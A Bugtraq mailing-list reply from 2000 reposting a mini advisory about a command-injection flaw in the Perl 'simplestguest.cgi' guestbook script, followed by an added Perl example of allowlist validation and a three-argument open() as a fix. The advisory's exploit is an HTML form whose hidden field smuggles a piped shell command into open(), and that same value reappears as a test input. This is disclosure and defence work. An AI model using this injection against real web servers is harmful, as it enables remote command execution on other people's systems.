[18056] in bugtraq
Re: Insecure input validation in simplestmail.cgi
daemon@ATHENA.MIT.EDU (suid@SNEAKERZ.ORG)
Wed Dec 13 21:02:34 2000
Message-Id: <200012130029.LAA16807@jawa.chilli.net.au>
Date: Mon, 13 Dec 0100 01:14:04 +0000
Reply-To: suid@SNEAKERZ.ORG
From: suid@SNEAKERZ.ORG
X-To: h@CKZ.ORG
To: BUGTRAQ@SECURITYFOCUS.COM
> simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif Wright.
The whole group of "simplest" CGIs are bad. Web developers: don't use them.
I didn't really post this because it's pretty lame, but I looked at a few of these
a while back and here's something I put on my site in February (which used to
be suid.edu and is now www.sneakerz.org/~suid/).
suid@sneakerz.org - mini advisory - Tammies Husband Guestbook CGI
Software: simplestguest.cgi
URL: http://www.conservatives.net/atheist/scripts/simplestguest.html
Version: Version 2
Platforms: Unix
Type: Input validation problem
Summary:
Anyone can execute any command on the remote system with
the privileges of the web server.
Vulnerability:
The perl code does no input validation and performs an
open() on a user supplied input.
Exploit:
Build an HTML form resembling:
<form action=/cgi-bin/simplestguest.cgi method=POST>
<input type=hidden name=required value="NAME">
<input type=hidden name=guestbook
value=" | <command goes here> |">
<input type=hidden name="NAME" value="X">
<input type=submit>
</form>
Of course you could simply send this in a POST request directly
to the web server. Whatever.
http://www.sneakerz.org/~suid/
EOF
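
Added example, not part of the original post and not the script's own code: the advisory attributes the problem to an open() on unvalidated user input, so this Perl code shows an allowlist check on the "guestbook" parameter followed by a three-argument open(). The directory path, function names and allowed-name pattern are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not code from simplestguest.cgi. The parameter name
# "guestbook" comes from the advisory; everything else is assumed.
use strict;
use warnings;
use File::Spec;

# Assumed layout: guestbooks live in one fixed directory set by the admin.
my $BOOK_DIR = '/var/www/guestbooks';    # hypothetical path

# Pattern the advisory describes, shown only as a comment: with a
# two-argument open(), a leading or trailing "|", ">" or "<" in the form
# value is read as a pipe or mode instead of as part of a file name.
#   open(BOOK, $form{guestbook});

# Accept only a bare file name: letters, digits, "_" and "-", with an
# optional ".html" or ".txt" suffix. Slashes, spaces, "|" and other
# metacharacters never match, so path traversal is rejected as well.
sub safe_book_name {
    my ($name) = @_;
    return unless defined $name;
    return $1 if $name =~ /\A([A-Za-z0-9_-]{1,64}(?:\.(?:html|txt))?)\z/;
    return;
}

# Three-argument open() with an explicit mode: the path argument is
# never parsed for pipe or redirection characters.
sub open_guestbook {
    my ($raw) = @_;
    my $name = safe_book_name($raw);
    die "rejected guestbook name\n" unless defined $name;
    my $path = File::Spec->catfile($BOOK_DIR, $name);
    open(my $fh, '>>', $path) or die "cannot open $path: $!\n";
    return $fh;
}

# Constructed sample inputs, run through the validator only. The second
# one is the placeholder value from the advisory's form, taken literally.
for my $input ('guestbook.html', ' | <command goes here> |',
               '../../etc/passwd', 'a b') {
    my $ok = safe_book_name($input);
    printf "%-28s => %s\n", "'$input'",
        defined $ok ? "accepted ($ok)" : 'rejected';
}
```

When the CGI runs under taint mode (-T), the regex capture in safe_book_name() is also what untaints the value before it reaches open().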